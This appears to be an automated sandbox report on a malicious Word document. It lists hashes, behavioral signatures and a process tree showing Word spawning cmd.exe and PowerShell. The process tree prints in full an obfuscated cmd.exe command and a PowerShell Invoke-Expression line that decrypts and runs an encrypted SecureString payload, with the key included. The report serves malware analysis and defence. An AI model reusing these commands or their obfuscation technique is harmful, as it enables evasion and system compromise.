Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
20/09/2024, 12:32
Behavioral task
behavioral1
Sample
ed97ee2d08454ed55047538abd393544_JaffaCakes118.doc
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
ed97ee2d08454ed55047538abd393544_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
ed97ee2d08454ed55047538abd393544_JaffaCakes118.doc
-
Size
178KB
-
MD5
ed97ee2d08454ed55047538abd393544
-
SHA1
fe69c392b19223592be202974552818de8abd2a9
-
SHA256
256e95b41be42509e33cfd8730065c8ba6722d46523518a41f605169ce22de69
-
SHA512
a0c24a1015c5fe7eae785893c76da3073687e3d2eb8e72e7db73ee043c84c2207ee535620e133bb1ec167045fc1fec6607d057c9813d42d7c76c5ebee5813fc6
-
SSDEEP
1536:4DNVczHkD9icmT+FFdZ+a9BGy4+qiQSLxSBAN0Zg+Zfg9ZchEZP5dIHwMa1vgwKQ:4Dn/iKFf4uOZ6wMwU1cUScys/GO
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2756 2520 cmd.exe 29 -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 2756 cmd.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2520 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2752 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2752 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2520 WINWORD.EXE 2520 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2520 wrote to memory of 2516 2520 WINWORD.EXE 30 PID 2520 wrote to memory of 2516 2520 WINWORD.EXE 30 PID 2520 wrote to memory of 2516 2520 WINWORD.EXE 30 PID 2520 wrote to memory of 2516 2520 WINWORD.EXE 30 PID 2520 wrote to memory of 2756 2520 WINWORD.EXE 31 PID 2520 wrote to memory of 2756 2520 WINWORD.EXE 31 PID 2520 wrote to memory of 2756 2520 WINWORD.EXE 31 PID 2520 wrote to memory of 2756 2520 WINWORD.EXE 31 PID 2756 wrote to memory of 2752 2756 cmd.exe 34 PID 2756 wrote to memory of 2752 2756 cmd.exe 34 PID 2756 wrote to memory of 2752 2756 cmd.exe 34 PID 2756 wrote to memory of 2752 2756 cmd.exe 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ed97ee2d08454ed55047538abd393544_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2516
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" btYzdBrPO wbBUhitViSiTJqiVAst GJdLHFAaPD & %C^om^S^pEc% %C^om^S^pEc% /V /c set %HkcqfHrTimwcvYO%=wZGEknMEbCwWha&&set %iUYkizvrDtIs%=p&&set %SastorjCqv%=ow&&set %TTpCsFIpqNSCAqX%=ZBGcfEMYmUX&&set %XzGTSsiL%=!%iUYkizvrDtIs%!&&set %YOdJVmETcmsjInJ%=smhmVjucwPEv&&set %GwIZQaJLmNual%=er&&set %WouPrUP%=!%SastorjCqv%!&&set %WzFrpZBMhR%=s&&set %OGRPXhkaNDwQwXu%=jUwpVVTlEhCrTA&&set %Airnuhr%=he&&set %idloWbckwG%=ll&&!%XzGTSsiL%!!%WouPrUP%!!%GwIZQaJLmNual%!!%WzFrpZBMhR%!!%Airnuhr%!!%idloWbckwG%! "Iex(([rUnTIME.INterOPsERVIcES.MArshAl]::([ruNTimE.InTEroPSerViCES.maRShAl].GeTmEmBerS()[3].nAME).inVoKe([RunTIme.InTErOpsERviCES.MArsHAL]::sEcUResTRINgtOBsTR( $('76492d1116743f0423413b16050a5345MgB8AHgATQBJAFAASQBNADYAcQBiADAASwBIADAAdAAyAEgAWABOAEwAUABiAHcAPQA9AHwANAAxADAANQAwAGQAMQAwADEANgA5ADUAOAAzADAAMgAwADEAZQA2ADcAZAAxADgANwA4ADMAMAAyAGQANAA1ADEAMgAxAGEAMAA0ADEAOQAwADUANgBjADIAOAA3ADEAZgAzADgAMAA1AGUAZgAyAGYAZAAxADQANwA0ADAAMAAwAGQAOQA5AGQAOQBkAGEAYQA5ADgAYwBjADQANwAxADgAMAA5ADMAMQA0ADQAYgAzAGIAYgAxAGQAMQBhADcAMwAyAGEAYgAxADcAMABlADYAZAA3ADIANgA5ADIAZQBmAGIANwBkADgANABmADEANQAyADYAYgBlAGUAZABhAGYAYQBlADEANAAxADMAZAAzADAANwAzAGIAYgBiADgAZgA3ADEAOABmADcAZgA3AGYAMQAwAGMAMgBkAGQAOABmADIAMAA2AGMAMwA1ADUAOQA0AGQANgAyADAAMABmADEAYQBjAGEANAAxADIAZgBlAGYAYgA4AGYAYgA4ADIAZgBkADYAOAAzAGYAMQA0ADYAMQBiADcAOAAwADgANQA1ADcAOAA4ADEAZQA5ADYANAAxAGIAZABkADAANAAyADQANwBkADgAMAA0ADQAYQBlADkANgA4AGUAZgAzADIAMAA1ADIAMQA3AGMANwA4ADMAOABiAGEANgAzADUAMgBlAGQAYQA2AGEAOQA2AGEAZQA2AGMANgA2AGQAYgBlAGEAYgBiADEAZABlAGMAMAA5ADMAMQAwADMAZAA1AGYAOAAxADQAOAA5ADgAMgA4ADUAZAAyADEAZQBjAGQANABiADEANgA5ADQAZAAyAGIAOQBjAGIAOQA3ADkAMgA2ADUAOQA4ADQAMgAwAGMANgA4AGUANgBhADkAOABjAGUAZgA0AGUANgBlAGEAYwA4ADAANwBiAGQAYwBkAGMANAA5ADMAMAA5AGUAOQA5AGQAMABlAGMANwA3AGQAMgA3ADQAYQBjADAANAA1AGIANAAwADgANQBmADgAZABjAGYAMQA2AGQAMgBhADcAYQAyADQAYQA1AGUANgBhAGMAYQBjADgAOAA0AGUAYQA1ADUAZQAxADQAYQA2ADIAYwAzADEAYgBkAGIAZQBhADYAMgAwADYAMAA1AGMAYQBlAGIAZAA0AGUAMABkADcAZABjADEANgBiADUANwBkADYAOABjAGMANQA5ADQAYwBmADAAMgAyADIAYgA4AGMAOQBkADEAMgAxADYAMQA4AGQAMAAwAGIAZQAzAGEANQAxAGIAYgA0ADAAMQA0ADgANQBmADgAOQBlADgAOAA4ADcAMABkADQANQA2ADgAYQAwAGQANAA5ADcAOQAxADAAYwBjADkAOABjADUAOQA0AGQANgBjADkAZQA1AGIAZABjAGEAOQA2ADAANwBmAGYAOABhADcANgA0AGMANwBmAGQANwA5AGMAOQBhAGIAMwAxADkANAAxADAAMwA0ADIAYwA4ADkAZAAzADIAZgAxAGYAMwBkAGYANABjAGYAYwBkAGEAZAAxADUAMAA0ADAAYQAyAGMAZAA5ADAANAAxADIANwBhAGMANwBkADgANwA3AGMAMgAzADIAMwA4ADgAZQA0AGIANgA2AGIAOABlADcAYQBiADIAMwAwADYAYwBlADcAMwBjADAAMQAzAGYAMAAxADkAZABlADcAZAA1ADkAMAA1ADQANgBjAGIAMAA5AGUAMQAwADMAMwAzAGUAZAA0AGYAZQBhADkANQA4ADkANQA2ADYAYQA2ADMANQAxAGUAMgAzADIAZQBhADIAYgAxADAAMABmADgANQA3ADMAOQAxAGYANgAxADAAMQA5ADkAYwBmADYAZQBjAGUANABlADQAOAA4ADAAYgAyAGIANgBmADUAZAA3ADgANQAxAGEAMAA0AGYAZQA3AGIAZAA0ADgANgAxAGYAMwA3ADkAMQBlADQAOQA5AGMAYQBkADAAZQBjADUAMQA5ADUANwAxAGYAMgAwAGIANwAxAGQAYwA4ADQANwBjAGIAOAAwADQAMAA5ADMAMQAwADYAYgA1AGYANgA4ADIAOAA2ADkAMQA5AGMAYQAzADMAYgBkADAAZABlADgAOAA4AGIANwAwAGQAZQAwADMAZQA1AGEAZgA3AGUAZQA5ADcAOAA0ADYAMABmADgAOQA2ADQAOAAyAGQAYwBkAGQAOAA1AGYAZABlADAANgBkAGMAMAA0AGEAYgAwAGUANgBkADMAMgA3ADgAZQA0ADgAZQBmADIAMAAwAGEAMQAzAGEAZgAzAGMAMABkAGMANABmADQAMwA5ADYAZgBlAGIAYQBhAGEAZQAxAGUAOQA1AGEAYQBjAGMAYgBlADAAYgBlADYANABjADgAZgA1AGIANwAzADYAMAAwAGUAOABhADYAMABiAGMAOQAzAGQAMAA2ADUAZgAwADgAMQA1AGYAOAAwADcAZABmAGIAOAA0ADUANQBjAGUANgA2AGYAMAAzAGQAMQBhAGYAMABhADMAYQBiADkAMAA4ADEAYgA0AGQANABhADQAOAA4ADAAYQBhAGUAZgAyADYAMAA3ADEAMABhADEANABjAGEAYQA4ADUAMwA3ADEAMABhADcAZQA0AGIAMABlADYAYgAzAGMAZAAxAGIAYwAzAGUANwA0AGYAMwA3ADQAMwAyAGQANQBhADcANABhAGUANgA1AGYAMAA0AGYAYQBkADYAZQBmAGUAOQAwAGMAMQBlAGUAMQBlAGYAYgA4ADIAMgA3AGEAYgA0AGMAYQAxADAAMgBiAGIAMAA4ADYANgBiAGIANwA1AGEAMQAyAGQAZQA5ADYAYwA0AGMAZABiADAANQBhADkAMwBkAGQAZAA2ADYAYgAxAGUAOAAxADUAYgBkAGYAMQBiADIANABiADIAMQBlADcAOABlAGQAZQAyADEAMAA4AGQAYwAzADgANgA4AGYAMgBiADgAZQBmADQANgBjADEAYQA5ADIAYwAzAGYANgAwADUAYwBjADUAMAAzADcAMgAxADgAMAA2ADkAMABlAGIAMAA5ADIAZABhADgAMwAwADEANwBkADgAYgA0AGIAZgBlADkAMAA1ADAAYQAxADEAMAA5ADQAZgA4ADYANgBhADMAOQBmADIAYgBhADUANAA1AGYAOAAyADEAZQBlADQAOQA4ADgAYwA4ADgANgAzAGQAYQA4ADIAZgBjADAAMwA0AGEAMQAwADQANwAzAGEAZAA0AGMAMwA4ADIAYgA3ADYAMAAwAGQANgA4AGIAMwBhAGYANwBhADcAOABlADUAMAA5ADIANAA2AGQAMAA5AGUAYQBiAGIAZABjADUAZAA4AGYAZQAxAGEAMQA3ADIAYgBjADMANgBkADgANQA3ADEANABhADMAMwBlAGQAYQBkADYAYQA2AGYAMgAxADAAZABkAGUANgBkAGUANABhADEAYgAzAGIAMgBlAGEAYQA5ADIAZAA2ADYAYgA1ADEAOABiADIAMAAzAGUAMABhADAAYQAwADgAZgAxAGMANwAyADkAZQA4AGIAMQBhADUAYwAzAGQANQBmAGEAYgA4AGUAMABkADEANwBmADYAZgA5AGMAZAA2AGYAOQA0ADgAMgA3ADUAYwAyADcANwA0AGUAMAAwADkAMgAyADMANQA4ADQAOQBhADMANAA5ADUAYwBmADUAZQA5ADEAMwA2AGYAYwBmADkAOABkADUAMgBjADMAZgA1AGEANgBjADMAYgBjAGIANgAzAGEAMQA2ADEAYgAwAGUAOABjADQANQA3ADYAMwAzAGEAOQA0ADMAZQA5ADkAYQAwADIAMQBkAGQANgBiADcANQAxADEAOAA2ADcANgBhADgANgA3ADUANgBhADUAMgA0ADAAYwA5ADIAMABjADcAZgAyADIAZABjADcAZQBkADcAYgA0AGIAMwBkAGYAZQA0ADQAOQAwAGQAZQBkADEAOQBiADEAOQAyAGMAMAA4ADQAZABmAGMAMgA2AGYAMAAxAGUAYwA3ADYAOQA0AGYAYQBmADAAMABlADcAOABkADYANgA3ADEAOAA5AGQAMwAzAGIAZgBkAGQAYwBmADQAYgBiADcAZQBkADUAZAA2ADQANAAwAGIANQBlADcANgAzADkAMQBiADkANAA3AA=='| ConVErtto-secUreSTrING -kE 38,121,176,251,225,133,130,146,96,162,134,217,185,23,42,29,16,243,125,131,194,149,53,96,234,239,102,97,83,35,87,204) ) )) )2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "Iex(([rUnTIME.INterOPsERVIcES.MArshAl]::([ruNTimE.InTEroPSerViCES.maRShAl].GeTmEmBerS()[3].nAME).inVoKe([RunTIme.InTErOpsERviCES.MArsHAL]::sEcUResTRINgtOBsTR( $('76492d1116743f0423413b16050a5345MgB8AHgATQBJAFAASQBNADYAcQBiADAASwBIADAAdAAyAEgAWABOAEwAUABiAHcAPQA9AHwANAAxADAANQAwAGQAMQAwADEANgA5ADUAOAAzADAAMgAwADEAZQA2ADcAZAAxADgANwA4ADMAMAAyAGQANAA1ADEAMgAxAGEAMAA0ADEAOQAwADUANgBjADIAOAA3ADEAZgAzADgAMAA1AGUAZgAyAGYAZAAxADQANwA0ADAAMAAwAGQAOQA5AGQAOQBkAGEAYQA5ADgAYwBjADQANwAxADgAMAA5ADMAMQA0ADQAYgAzAGIAYgAxAGQAMQBhADcAMwAyAGEAYgAxADcAMABlADYAZAA3ADIANgA5ADIAZQBmAGIANwBkADgANABmADEANQAyADYAYgBlAGUAZABhAGYAYQBlADEANAAxADMAZAAzADAANwAzAGIAYgBiADgAZgA3ADEAOABmADcAZgA3AGYAMQAwAGMAMgBkAGQAOABmADIAMAA2AGMAMwA1ADUAOQA0AGQANgAyADAAMABmADEAYQBjAGEANAAxADIAZgBlAGYAYgA4AGYAYgA4ADIAZgBkADYAOAAzAGYAMQA0ADYAMQBiADcAOAAwADgANQA1ADcAOAA4ADEAZQA5ADYANAAxAGIAZABkADAANAAyADQANwBkADgAMAA0ADQAYQBlADkANgA4AGUAZgAzADIAMAA1ADIAMQA3AGMANwA4ADMAOABiAGEANgAzADUAMgBlAGQAYQA2AGEAOQA2AGEAZQA2AGMANgA2AGQAYgBlAGEAYgBiADEAZABlAGMAMAA5ADMAMQAwADMAZAA1AGYAOAAxADQAOAA5ADgAMgA4ADUAZAAyADEAZQBjAGQANABiADEANgA5ADQAZAAyAGIAOQBjAGIAOQA3ADkAMgA2ADUAOQA4ADQAMgAwAGMANgA4AGUANgBhADkAOABjAGUAZgA0AGUANgBlAGEAYwA4ADAANwBiAGQAYwBkAGMANAA5ADMAMAA5AGUAOQA5AGQAMABlAGMANwA3AGQAMgA3ADQAYQBjADAANAA1AGIANAAwADgANQBmADgAZABjAGYAMQA2AGQAMgBhADcAYQAyADQAYQA1AGUANgBhAGMAYQBjADgAOAA0AGUAYQA1ADUAZQAxADQAYQA2ADIAYwAzADEAYgBkAGIAZQBhADYAMgAwADYAMAA1AGMAYQBlAGIAZAA0AGUAMABkADcAZABjADEANgBiADUANwBkADYAOABjAGMANQA5ADQAYwBmADAAMgAyADIAYgA4AGMAOQBkADEAMgAxADYAMQA4AGQAMAAwAGIAZQAzAGEANQAxAGIAYgA0ADAAMQA0ADgANQBmADgAOQBlADgAOAA4ADcAMABkADQANQA2ADgAYQAwAGQANAA5ADcAOQAxADAAYwBjADkAOABjADUAOQA0AGQANgBjADkAZQA1AGIAZABjAGEAOQA2ADAANwBmAGYAOABhADcANgA0AGMANwBmAGQANwA5AGMAOQBhAGIAMwAxADkANAAxADAAMwA0ADIAYwA4ADkAZAAzADIAZgAxAGYAMwBkAGYANABjAGYAYwBkAGEAZAAxADUAMAA0ADAAYQAyAGMAZAA5ADAANAAxADIANwBhAGMANwBkADgANwA3AGMAMgAzADIAMwA4ADgAZQA0AGIANgA2AGIAOABlADcAYQBiADIAMwAwADYAYwBlADcAMwBjADAAMQAzAGYAMAAxADkAZABlADcAZAA1ADkAMAA1ADQANgBjAGIAMAA5AGUAMQAwADMAMwAzAGUAZAA0AGYAZQBhADkANQA4ADkANQA2ADYAYQA2ADMANQAxAGUAMgAzADIAZQBhADIAYgAxADAAMABmADgANQA3ADMAOQAxAGYANgAxADAAMQA5ADkAYwBmADYAZQBjAGUANABlADQAOAA4ADAAYgAyAGIANgBmADUAZAA3ADgANQAxAGEAMAA0AGYAZQA3AGIAZAA0ADgANgAxAGYAMwA3ADkAMQBlADQAOQA5AGMAYQBkADAAZQBjADUAMQA5ADUANwAxAGYAMgAwAGIANwAxAGQAYwA4ADQANwBjAGIAOAAwADQAMAA5ADMAMQAwADYAYgA1AGYANgA4ADIAOAA2ADkAMQA5AGMAYQAzADMAYgBkADAAZABlADgAOAA4AGIANwAwAGQAZQAwADMAZQA1AGEAZgA3AGUAZQA5ADcAOAA0ADYAMABmADgAOQA2ADQAOAAyAGQAYwBkAGQAOAA1AGYAZABlADAANgBkAGMAMAA0AGEAYgAwAGUANgBkADMAMgA3ADgAZQA0ADgAZQBmADIAMAAwAGEAMQAzAGEAZgAzAGMAMABkAGMANABmADQAMwA5ADYAZgBlAGIAYQBhAGEAZQAxAGUAOQA1AGEAYQBjAGMAYgBlADAAYgBlADYANABjADgAZgA1AGIANwAzADYAMAAwAGUAOABhADYAMABiAGMAOQAzAGQAMAA2ADUAZgAwADgAMQA1AGYAOAAwADcAZABmAGIAOAA0ADUANQBjAGUANgA2AGYAMAAzAGQAMQBhAGYAMABhADMAYQBiADkAMAA4ADEAYgA0AGQANABhADQAOAA4ADAAYQBhAGUAZgAyADYAMAA3ADEAMABhADEANABjAGEAYQA4ADUAMwA3ADEAMABhADcAZQA0AGIAMABlADYAYgAzAGMAZAAxAGIAYwAzAGUANwA0AGYAMwA3ADQAMwAyAGQANQBhADcANABhAGUANgA1AGYAMAA0AGYAYQBkADYAZQBmAGUAOQAwAGMAMQBlAGUAMQBlAGYAYgA4ADIAMgA3AGEAYgA0AGMAYQAxADAAMgBiAGIAMAA4ADYANgBiAGIANwA1AGEAMQAyAGQAZQA5ADYAYwA0AGMAZABiADAANQBhADkAMwBkAGQAZAA2ADYAYgAxAGUAOAAxADUAYgBkAGYAMQBiADIANABiADIAMQBlADcAOABlAGQAZQAyADEAMAA4AGQAYwAzADgANgA4AGYAMgBiADgAZQBmADQANgBjADEAYQA5ADIAYwAzAGYANgAwADUAYwBjADUAMAAzADcAMgAxADgAMAA2ADkAMABlAGIAMAA5ADIAZABhADgAMwAwADEANwBkADgAYgA0AGIAZgBlADkAMAA1ADAAYQAxADEAMAA5ADQAZgA4ADYANgBhADMAOQBmADIAYgBhADUANAA1AGYAOAAyADEAZQBlADQAOQA4ADgAYwA4ADgANgAzAGQAYQA4ADIAZgBjADAAMwA0AGEAMQAwADQANwAzAGEAZAA0AGMAMwA4ADIAYgA3ADYAMAAwAGQANgA4AGIAMwBhAGYANwBhADcAOABlADUAMAA5ADIANAA2AGQAMAA5AGUAYQBiAGIAZABjADUAZAA4AGYAZQAxAGEAMQA3ADIAYgBjADMANgBkADgANQA3ADEANABhADMAMwBlAGQAYQBkADYAYQA2AGYAMgAxADAAZABkAGUANgBkAGUANABhADEAYgAzAGIAMgBlAGEAYQA5ADIAZAA2ADYAYgA1ADEAOABiADIAMAAzAGUAMABhADAAYQAwADgAZgAxAGMANwAyADkAZQA4AGIAMQBhADUAYwAzAGQANQBmAGEAYgA4AGUAMABkADEANwBmADYAZgA5AGMAZAA2AGYAOQA0ADgAMgA3ADUAYwAyADcANwA0AGUAMAAwADkAMgAyADMANQA4ADQAOQBhADMANAA5ADUAYwBmADUAZQA5ADEAMwA2AGYAYwBmADkAOABkADUAMgBjADMAZgA1AGEANgBjADMAYgBjAGIANgAzAGEAMQA2ADEAYgAwAGUAOABjADQANQA3ADYAMwAzAGEAOQA0ADMAZQA5ADkAYQAwADIAMQBkAGQANgBiADcANQAxADEAOAA2ADcANgBhADgANgA3ADUANgBhADUAMgA0ADAAYwA5ADIAMABjADcAZgAyADIAZABjADcAZQBkADcAYgA0AGIAMwBkAGYAZQA0ADQAOQAwAGQAZQBkADEAOQBiADEAOQAyAGMAMAA4ADQAZABmAGMAMgA2AGYAMAAxAGUAYwA3ADYAOQA0AGYAYQBmADAAMABlADcAOABkADYANgA3ADEAOAA5AGQAMwAzAGIAZgBkAGQAYwBmADQAYgBiADcAZQBkADUAZAA2ADQANAAwAGIANQBlADcANgAzADkAMQBiADkANAA3AA=='| ConVErtto-secUreSTrING -kE 38,121,176,251,225,133,130,146,96,162,134,217,185,23,42,29,16,243,125,131,194,149,53,96,234,239,102,97,83,35,87,204) ) )) )3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5c2e290b648e4bb19babc5567a8ba8ab6
SHA14b18fefc411cea49c8bb4ca002751994e1dda5a8
SHA256784b091157cf364b88b22fc67967eacf564222a5832d8cd5389790349a36902b
SHA5120ddaf938e3f0f92e95334aba79ebccde4c5642e542d5d748050a2f556f2b77ad64ed94d6c527fe24ea25883bf5e89f85d9188255455a3093ac4b66ff60d43a9b